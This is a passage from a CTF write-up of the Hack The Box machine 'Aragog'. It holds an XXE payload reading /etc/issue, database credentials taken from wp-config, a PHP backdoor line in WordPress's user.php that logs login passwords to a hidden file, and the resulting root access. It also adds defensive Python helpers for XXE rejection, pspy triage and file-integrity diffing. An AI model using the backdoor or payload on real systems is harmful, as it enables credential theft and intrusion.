         &lt;span class=&quot;nv&quot;&gt;$base&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;ip2long&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'255.255.255.255'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
         &lt;span class=&quot;k&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;32&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;log&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;((&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$long&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;^&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$base&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
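&lt;p&gt;As an added example (not code from the box or from the write-up’s author), here is a Python re-implementation of the subnet logic in hosts.php with the XML step hardened. It shows where the two numbers seen earlier come from, 62 for the mask in test.txt and 4294967294 when no subnet_mask is supplied, and it refuses any request body that carries a DOCTYPE, which is where the ENTITY declaration used by the payload above has to live. The sample bodies are constructed.&lt;/p&gt;

```python
"""Hardened re-implementation of hosts.php's subnet calculation (added
example, not the box's own code).

PHP's ip2long() returns false for an empty or invalid mask and the XOR in
mask2cidr() treats that false as 0, which is why a request without a
subnet_mask yields 2^32 - 2 = 4294967294. 255.255.255.192 yields 62.
"""
import math
import xml.etree.ElementTree as ET
from urllib.parse import unquote
from xml.parsers import expat


def ip2long(mask):
    """Mirror PHP ip2long(): dotted quad to a 32-bit integer, 0 on failure."""
    parts = str(mask or "").strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() and int(p) in range(256) for p in parts):
        return 0  # PHP returns false here; the XOR below sees it as 0
    value = 0
    for p in parts:
        value = value * 256 + int(p)
    return value


def mask2cidr(mask):
    """Same arithmetic as hosts.php: 32 - log2((mask XOR 0xFFFFFFFF) + 1)."""
    long_ = ip2long(mask)
    base = ip2long("255.255.255.255")
    return 32 - math.log2((long_ ^ base) + 1)


def usable_hosts(mask):
    """2^(32 - cidr) - 2, the value hosts.php echoes back to the client."""
    bits = 32 - mask2cidr(mask)
    return int(round(2 ** bits - 2))


def reject_doctype(xml_text):
    """Raise ValueError if the document carries a DOCTYPE.

    No DOCTYPE means no entity declarations, so a SYSTEM entity pointing
    at a local file cannot be declared at all. Using expat's own DOCTYPE
    callback rather than a substring check still catches a declaration
    wrapped in unusual whitespace or comments.
    """
    seen = []
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = lambda name, *rest: seen.append(name)
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError:
        pass  # malformed XML is rejected by ElementTree in count_hosts()
    if seen:
        raise ValueError("DOCTYPE %r is not allowed" % seen[0])


def count_hosts(body):
    """Hardened equivalent of the request handling in hosts.php."""
    reject_doctype(body)
    root = ET.fromstring(body)  # stdlib ElementTree never loads external entities
    if root.tag != "details":
        raise ValueError("unexpected root element %r" % root.tag)
    mask = root.findtext("subnet_mask", default="")
    return usable_hosts(mask.strip())


def is_rejected(body):
    """True when count_hosts() refuses the body."""
    try:
        count_hosts(body)
    except (ValueError, ET.ParseError):
        return True
    return False


# Constructed sample bodies, kept percent-encoded as they would appear in a
# URL-encoded request log; unquote() restores the raw XML.
TEST_TXT_BODY = unquote(
    "%3Cdetails%3E%3Csubnet_mask%3E255.255.255.192%3C/subnet_mask%3E"
    "%3Ctest%3E%3C/test%3E%3C/details%3E"
)
XXE_BODY = unquote(
    "%3C?xml version=%221.0%22?%3E"
    "%3C!DOCTYPE foo [%3C!ELEMENT foo ANY%3E"
    "%3C!ENTITY xxe SYSTEM %22file:///etc/issue%22%3E]%3E"
    "%3Cdetails%3E%3Csubnet_mask%3E%26xxe;%3C/subnet_mask%3E%3C/details%3E"
)


if __name__ == "__main__":
    print("test.txt mask:", count_hosts(TEST_TXT_BODY))   # 62
    print("empty mask:", usable_hosts(""))                  # 4294967294
    print("XXE payload rejected:", is_rejected(XXE_BODY))  # True
```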
&lt;h2 id=&quot;privilege-escalation&quot;&gt;Privilege Escalation&lt;/h2&gt;

&lt;h3 id=&quot;discovering-dev_wiki-wordpress-site&quot;&gt;Discovering dev_wiki wordpress site&lt;/h3&gt;

&lt;p&gt;Interesting, we see additional content being served from the &lt;code class=&quot;highlighter-rouge&quot;&gt;/var/www/html&lt;/code&gt; directory.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;florian@aragog:/var/www/html$ ls -la
total 68
drwxrwxrwx 4 www-data www-data  4096 Jul 21 05:55 .
drwxr-xr-x 3 root     root      4096 Dec 18  2017 ..
drwxrwxrwx 5 cliff    cliff     4096 Jul 21 05:55 dev_wiki
-rw-r--r-- 1 www-data www-data   689 Dec 21  2017 hosts.php
-rw-r--r-- 1 www-data www-data 11321 Dec 18  2017 index.html
-rw-r--r-- 1 florian  florian  36650 Jul 21 05:55 wp-login.php
drw-r--r-- 5 cliff    cliff     4096 Dec 20  2017 zz_backup
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;Inspecting the contents of the &lt;code class=&quot;highlighter-rouge&quot;&gt;dev_wiki&lt;/code&gt; directory, we see that it’s a WordPress blog. Additionally it seems that we have full control over the &lt;code class=&quot;highlighter-rouge&quot;&gt;dev_wiki&lt;/code&gt; directory. Let’s see if we can visit the &lt;code class=&quot;highlighter-rouge&quot;&gt;dev_wiki&lt;/code&gt; WordPress site in our browser.&lt;/p&gt;

&lt;p&gt;But before we do that we need to add &lt;em&gt;aragog&lt;/em&gt; as an entry in our &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/hosts&lt;/code&gt; file first.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;echo &quot;10.10.10.78 aragog&quot; &amp;gt;&amp;gt; /etc/hosts&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/10.png&quot; alt=&quot;&amp;quot;Dev Wiki Wordpress&amp;quot;&quot; title=&quot;Dev Wiki Wordpress&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Looking at the blog we see that there’s only one post, stating that cliff will be logging in regularly.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/11.png&quot; alt=&quot;&amp;quot;Cliff's Message&amp;quot;&quot; title=&quot;Cliff's Message&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Let’s see what the username and password for the MySQL database are…&lt;/p&gt;

&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;florian@aragog:/var/www/html/dev_wiki$ cat wp-config.php
&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class=&quot;o&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nx&quot;&gt;snip&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;...&lt;/span&gt;

&lt;span class=&quot;c1&quot;&gt;// ** MySQL settings - You can get this info from your web host ** //
&lt;/span&gt;&lt;span class=&quot;sd&quot;&gt;/** The name of the database for WordPress */&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;define&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'DB_NAME'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'wp_wiki'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;

&lt;span class=&quot;sd&quot;&gt;/** MySQL database username */&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;define&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'DB_USER'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'root'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;

&lt;span class=&quot;sd&quot;&gt;/** MySQL database password */&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;define&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'DB_PASSWORD'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'$@y6CHJ^$#5c37j$#6h'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;

&lt;span class=&quot;sd&quot;&gt;/** MySQL hostname */&lt;/span&gt;
&lt;span class=&quot;nb&quot;&gt;define&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s1&quot;&gt;'DB_HOST'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'localhost'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Let’s have a look at the WordPress database &amp;amp; see if we can discover any WP user passwords we can crack.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;florian@aragog:/var/www/html/dev_wiki$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 55
Server version: 5.7.20-0ubuntu0.16.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;mysql&amp;gt; show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| wp_wiki            |
+--------------------+
5 rows in set (0.03 sec)

mysql&amp;gt; use wp_wiki;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql&amp;gt; show tables;
+-----------------------+
| Tables_in_wp_wiki     |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.01 sec)

mysql&amp;gt; select * from wp_users;
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email      | user_url | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
|  1 | Administrator | $P$B3FUuIdSDW0IaIc4vsjj.NzJDkiscu. | administrator | it@megacorp.com |          | 2017-12-20 23:26:04 |                     |           0 | Administrator |
+----+---------------+------------------------------------+---------------+-----------------+----------+---------------------+---------------------+-------------+---------------+
1 row in set (0.01 sec)

mysql&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We attempted to crack the hash with John the Ripper &amp;amp; the rockyou wordlist but were unsuccessful, so this is likely unrelated.&lt;/p&gt;

&lt;h3 id=&quot;performing-process-monitoring-with-pspy&quot;&gt;Performing process monitoring with pspy&lt;/h3&gt;

&lt;p&gt;While doing your enumeration you would notice that the &lt;code class=&quot;highlighter-rouge&quot;&gt;dev_wiki&lt;/code&gt; directory was constantly being deleted, every few minutes or so. To get a better idea of what’s going on we can monitor the running processes on the box.&lt;/p&gt;

&lt;p&gt;Hack the Box member &lt;a href=&quot;https://forum.hackthebox.eu/profile/0b5cur17y&quot;&gt;0b5cur17y&lt;/a&gt; created a fantastic tool called &lt;a href=&quot;https://github.com/DominicBreuker/pspy&quot;&gt;pspy&lt;/a&gt;. It’s very common for HTB machines to require you to guess random crontab entries or find process parameters/command lines. If you view the &lt;a href=&quot;https://forum.hackthebox.eu/discussion/501/pspy-process-monitoring-cron-job-detection#latest&quot;&gt;original thread&lt;/a&gt; you will understand what I mean.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;using pspy to discover wp-login.py&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;florian@aragog:/tmp/.ps$ wget -q http://10.10.15.207:7777/pspy64
florian@aragog:/tmp/.ps$ chmod +x pspy64
florian@aragog:/tmp/.ps$ ./pspy64
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;After some time we see that there is a cronjob that is constantly deleting the dev_wiki folder &amp;amp; replacing it with the backup folder… &amp;amp; a script &lt;code class=&quot;highlighter-rouge&quot;&gt;wp-login.py&lt;/code&gt; is run shortly after that process happens.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://i.imgur.com/UkP4rOp.png&quot; alt=&quot;&amp;quot;restore.sh &amp;amp; wp-login.py Cronjob Task&amp;quot;&quot; title=&quot;Restore.sh &amp;amp; wp-login.py Cronjob Task&quot; /&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;2018/07/21 06:35:01 CMD: UID=1001 PID=3870   | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2018/07/21 06:35:01 CMD: UID=0    PID=3869   | /usr/sbin/CRON -f
2018/07/21 06:35:01 CMD: UID=1001 PID=3868   | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2018/07/21 06:35:01 CMD: UID=0    PID=3867   | /usr/sbin/CRON -f
2018/07/21 06:35:01 CMD: UID=0    PID=3866   | /usr/sbin/CRON -f
2018/07/21 06:35:01 CMD: UID=0    PID=3872   | rm -rf /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=0    PID=3871   | /bin/bash /root/restore.sh
2018/07/21 06:35:01 CMD: UID=0    PID=3873   | cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=1001 PID=3875   |
2018/07/21 06:35:01 CMD: UID=1001 PID=3874   | sh -c LC_ALL=C LANG=C /sbin/ldconfig -p 2&amp;gt;/dev/null
2018/07/21 06:35:01 CMD: UID=0    PID=3878   | chown -R cliff:cliff /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=0    PID=3879   | chmod -R 777 /var/www/html/dev_wiki/
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
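&lt;p&gt;A small triage helper for a pspy capture, added here as an example and not part of the original write-up: it parses the pspy line format shown above (a constructed sample that reuses this box’s lines) and flags the two things worth reading next, the root job that chmods the web root to 777 and the scripts launched in the same cron burst, with the UID each ran under.&lt;/p&gt;

```python
"""Triage helper for a pspy capture (added example, not from the write-up).

pspy64 prints one line per observed process:
    YYYY/MM/DD HH:MM:SS CMD: UID=N PID=N | command line
The helper parses those lines and flags the two things an analyst wants to
read next: a root job that makes a web root world-writable, and every script
that the cron burst launched (with the UID it ran under).
"""
import re
from collections import namedtuple

Event = namedtuple('Event', 'ts uid pid cmd')

LINE_RE = re.compile(
    r'^(\d{4}/\d\d/\d\d \d\d:\d\d:\d\d) CMD: UID=(\d+)\s+PID=(\d+)\s*\|\s*(.*)$')
# chmod 777 / chmod -R 777 / chmod 0777 followed by the target path
CHMOD_777_RE = re.compile(r'\bchmod\s+(?:-R\s+)?0?777\s+(\S+)')
# any absolute path ending in .sh or .py anywhere in the command line
SCRIPT_RE = re.compile(r'(/\S+\.(?:sh|py))\b')

# Constructed sample: the 06:35:01 cron burst captured on this box
# (the duplicate wp-login.py launch and the ldconfig line are left out).
SAMPLE = """\
2018/07/21 06:35:01 CMD: UID=1001 PID=3870   | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2018/07/21 06:35:01 CMD: UID=0    PID=3869   | /usr/sbin/CRON -f
2018/07/21 06:35:01 CMD: UID=0    PID=3872   | rm -rf /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=0    PID=3871   | /bin/bash /root/restore.sh
2018/07/21 06:35:01 CMD: UID=0    PID=3873   | cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=1001 PID=3875   |
2018/07/21 06:35:01 CMD: UID=0    PID=3878   | chown -R cliff:cliff /var/www/html/dev_wiki/
2018/07/21 06:35:01 CMD: UID=0    PID=3879   | chmod -R 777 /var/www/html/dev_wiki/
"""


def parse_pspy(text):
    """Turn pspy output into Event tuples; lines that do not match are skipped.

    A line whose command is empty (pspy lost the race reading /proc) is kept
    with cmd == '' so the PID stays accounted for.
    """
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.rstrip())
        if m:
            events.append(Event(*m.groups()))
    return events


def triage(events):
    """Return findings: world-writable web paths set by root, and scripts run."""
    findings = {'world_writable': [], 'scheduled_scripts': []}
    seen = set()
    for ev in events:
        if ev.uid == '0':
            m = CHMOD_777_RE.search(ev.cmd)
            if m and m.group(1).startswith('/var/www/'):
                findings['world_writable'].append(m.group(1))
        for path in SCRIPT_RE.findall(ev.cmd):
            key = (ev.uid, path)
            if key not in seen:          # pspy often logs the same launch twice
                seen.add(key)
                findings['scheduled_scripts'].append(key)
    return findings


if __name__ == '__main__':
    for name, items in triage(parse_pspy(SAMPLE)).items():
        print(name)
        for item in items:
            print('   ', item)
```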

&lt;p&gt;If you Google &lt;code class=&quot;highlighter-rouge&quot;&gt;wp-login.py&lt;/code&gt; you find the following GitHub Gist: &lt;a href=&quot;https://gist.github.com/GreeeenApple/5a322bb44eae37ec9727&quot;&gt;wp-login.py&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Remember that blog post? “I’ll be logging in regularly”
&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/12.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;backdooring-wordpress-to-log-requests--getting-root&quot;&gt;Backdooring Wordpress to Log Requests &amp;amp; Getting Root&lt;/h3&gt;

&lt;p&gt;There are a few possible ways to accomplish this: backdoor &lt;code class=&quot;highlighter-rouge&quot;&gt;wp-login.php&lt;/code&gt; to send the login details to our server or have WordPress log the POST request to a file, or modify the login function in &lt;code class=&quot;highlighter-rouge&quot;&gt;wp-includes/user.php&lt;/code&gt; to log the username &amp;amp; password to a file.&lt;/p&gt;

&lt;p&gt;This part was a bit troubling since there were a few ways to accomplish this task, and the effort varied depending on which path you took. I consulted with some other HTB members &amp;amp; a good chunk of them went the &lt;code class=&quot;highlighter-rouge&quot;&gt;wp-login.php&lt;/code&gt; route, which I felt was much harder.&lt;/p&gt;

&lt;p&gt;There are a few good examples of how to “backdoor WordPress”, but I think the best example I’ve ever seen of backdooring a WordPress site was when &lt;a href=&quot;https://motherboard.vice.com/en_us/article/vv77y9/phineas-fisher-sme&quot;&gt;phineas fisher&lt;/a&gt; hacked the Catalan police department. It was very simple, clean, and pretty discreet. I honestly think this dude is a legend, and he recorded how he did it &amp;amp; posted it on the internet for people to learn. Some fantastic learning can be done from the video of the hack he did; I highly recommend watching it in full. (Also an obligatory #hackback)&lt;/p&gt;

&lt;p&gt;Video: &lt;a href=&quot;https://youtu.be/oI_ZhFCS3AQ?t=1745&quot;&gt;Phineas Fisher Hacks Catalan Police Department&lt;/a&gt; (stop watching at 30:01).&lt;/p&gt;

&lt;p&gt;&lt;em&gt;backdoor php code&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-php highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;file_put_contents(&quot;wp-includes/.m.php&quot;,&quot;WP :&quot; . $_POST['log']
    . &quot; : &quot; . $_POST['pwd'] . &quot;\n&quot;, FILE_APPEND);
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/aragog/13.png&quot; alt=&quot;&amp;quot;Backdooring wordpress-includes/user.php&amp;quot;&quot; title=&quot;Backdooring wordpress user.php&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We run some tests &amp;amp; see that our backdoor works. After some time the cleartext login credentials for the Administrator account appear in our log.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;florian@aragog:/var/www/html/dev_wiki/wp-includes$ cat .m.php
WP :tsst : test
WP :Administrator : !KRgYs(JFO!&amp;amp;MTr)lf
WP :medic : medic
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;getting root&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;florian@aragog:/var/www/html/dev_wiki/wp-includes$ su root
Password:
root@aragog:/var/www/html/dev_wiki/wp-includes# id
uid=0(root) gid=0(root) groups=0(root)
root@aragog:/var/www/html/dev_wiki/wp-includes#
root@aragog:/var/www/html/dev_wiki/wp-includes# cat /root/root.txt
9a9da5.....
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Let’s take a peek at &lt;code class=&quot;highlighter-rouge&quot;&gt;restore.sh&lt;/code&gt; &amp;amp; &lt;code class=&quot;highlighter-rouge&quot;&gt;wp-login.py&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;restore.sh&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@aragog:~# &lt;/span&gt;cat restore.sh
rm -rf /var/www/html/dev_wiki/
cp -R /var/www/html/zz_backup/ /var/www/html/dev_wiki/
chown -R cliff:cliff /var/www/html/dev_wiki/
chmod -R 777 /var/www/html/dev_wiki/
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
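&lt;p&gt;The file-level view of the same tampering, added here as an example and not part of the original write-up or of WordPress: because restore.sh rebuilds dev_wiki from zz_backup every few minutes, the backup is a ready-made integrity baseline, and a hash diff between the two trees surfaces both the edited user.php and the hidden .m.php log. The trees below are constructed in a temporary directory; no real install is touched.&lt;/p&gt;

```python
"""File-integrity diff for a WordPress tree (added example, not from the write-up).

On this box restore.sh rebuilds dev_wiki from zz_backup every few minutes, so
zz_backup is a ready-made baseline: anything that differs from it, or exists
only in the live tree, was planted after the last restore. The same check works
against any pristine copy or a stored hash manifest.
"""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map each regular file under root (dotfiles included) to its sha256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(full, 'rb') as fh:
                for chunk in iter(lambda: fh.read(65536), b''):
                    h.update(chunk)
            digests[os.path.relpath(full, root)] = h.hexdigest()
    return digests


def diff_trees(baseline_root, live_root):
    """Report paths added to, removed from, or modified in the live tree."""
    base = hash_tree(baseline_root)
    live = hash_tree(live_root)
    return {
        'added': sorted(set(live) - set(base)),
        'removed': sorted(set(base) - set(live)),
        'modified': sorted(p for p in base if p in live and base[p] != live[p]),
    }


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w') as fh:
        fh.write(text)


def demo():
    """Constructed backup/live pair mirroring the tampering described above."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = os.path.join(tmp, 'zz_backup')
        live = os.path.join(tmp, 'dev_wiki')
        pristine_user_php = 'function wp_signon($credentials) { /* pristine */ }\n'
        for root in (backup, live):
            _write(root, 'wp-includes/user.php', pristine_user_php)
            _write(root, 'wp-config.php', "define('DB_NAME', 'wp_wiki');\n")
        # live tree only: the logging line in user.php and the hidden log it writes
        _write(live, 'wp-includes/user.php',
               pristine_user_php + 'file_put_contents("wp-includes/.m.php", ...);\n')
        _write(live, 'wp-includes/.m.php', 'WP :tsst : test\n')
        return diff_trees(backup, live)


if __name__ == '__main__':
    print(demo())
```

&lt;p&gt;Because restore.sh overwrites the live tree every few minutes the diff has to be taken between two restores, and a real deployment keeps the baseline hashes somewhere a chmod -R 777 on the web root cannot reach.&lt;/p&gt;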

&lt;p&gt;&lt;em&gt;wp-login.py&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;root&lt;/span&gt;&lt;span class=&quot;nd&quot;&gt;@aragog&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;home&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;cliff&lt;/span&gt;&lt;span class=&quot;c&quot;&gt;# cat wp-login.py&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;requests&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;wp_login&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'http://127.0.0.1/dev_wiki/wp-login.php'&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;wp_admin&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'http://127.0.0.1/dev_wiki/wp-admin/'&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;username&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'Administrator'&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;password&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'!KRgYs(JFO!&amp;amp;MTr)lf'&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;with&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;requests&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;Session&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;headers1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'Cookie'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'wordpress_test_cookie=WP Cookie check'&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;n&quot;&gt;datas&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;s&quot;&gt;'log'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;username&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'pwd'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;password&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'wp-submit'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'Log In'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;s&quot;&gt;'redirect_to'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;wp_admin&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;'testcookie'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;'1'&lt;/span&gt;
